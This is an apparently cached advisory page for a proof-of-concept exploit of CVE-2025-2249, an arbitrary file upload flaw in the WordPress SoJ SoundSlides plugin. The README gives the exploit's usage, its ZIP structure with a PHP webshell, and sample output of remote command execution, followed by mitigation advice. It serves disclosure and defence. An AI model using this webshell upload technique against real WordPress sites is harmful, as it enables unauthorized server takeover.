CVE-2025-2249 PoC — WordPress plugin SoJ SoundSlides 代码问题漏洞

Source

https://github.com/Nxploited/CVE-2025-2249

Associated Vulnerability

Title:WordPress plugin SoJ SoundSlides 代码问题漏洞 (CVE-2025-2249)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin SoJ SoundSlides 1.2.2及之前版本存在代码问题漏洞，该漏洞源于soj_soundslides_options_subpanel函数缺少文件类型验证，可能导致认证攻击者上传任意文件并执行远程代码。

Description

 WordPress SoJ SoundSlides Plugin <= 1.2.2 is vulnerable to Arbitrary File Upload

Readme


# 🔐 WordPress SoJ SoundSlides Plugin <= 1.2.2 - Authenticated Arbitrary File Upload

> ⚠️ **DISCLAIMER:** This exploit is for educational and authorized testing purposes only.

---

## 📌 Vulnerability Summary

- **Plugin:** SoJ SoundSlides  
- **Affected Versions:** <= 1.2.2  
- **Type:** Authenticated (Contributor+) Arbitrary File Upload  
- **Patch Status:** ❌ No official fix available

The SoJ SoundSlides plugin allows authenticated users with **Contributor or higher** roles to upload arbitrary ZIP files. Due to missing validation, attackers can upload PHP webshells that are extracted and executed from a web-accessible directory.

---

## 💥 Impact

An attacker with valid WordPress credentials can:

- 📦 Upload a ZIP archive containing a PHP shell
- 🖥️ Execute system commands remotely (`?cmd=`)
- 🔓 Gain unauthorized control of the site/server

---

## 🛠️ Usage

```bash
usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,

options:
  -h, --help            show this help message and exit
  -u, --url URL         WordPress base URL
  -un, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

| Argument  | Description                    |
|-----------|--------------------------------|
| `-u`      | WordPress base URL             |
| `-un`     | WordPress username             |
| `-p`      | WordPress password             |

---

## ✨ Features

- 🔍 Version check from plugin `readme.txt`
- 🧰 Auto-generates ZIP with required structure and webshell
- 📤 Exploits vulnerable upload endpoint
- 💻 Interactive command execution via uploaded shell

---

## 📂 ZIP File Structure

```
nxploit/
├── index.html
├── data/
│   └── data.xml
├── audio/
│   └── audio.mp3
└── nxploit.php  ← PHP shell (?cmd=)
```

---

## 🧪 Example

```bash
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
```


---

## 🛡️ Mitigation

- ❌ Disable or remove the plugin
- 🧱 Apply upload restrictions
- 🔍 Monitor `wp-content/uploads/` for unexpected `.php` files



> Built with ❤️ by [Nxploited | Khaled ALenazi]  
> For education, awareness, and defense.

---

## 🧠 Final Note

Security is everyone's responsibility. Always test ethically, report responsibly, and protect the web.

File Snapshot


 [4.0K]  /data/pocs/a84dfc907ff73604f7d1efb2cb297654421d5101
├── [6.3K]  CVE-2025-2249.py
├── [128K]  exploit-demo.png
├── [1.1K]  LICENSE
├── [2.6K]  README.md
└── [   9]  requirements.txt

0 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!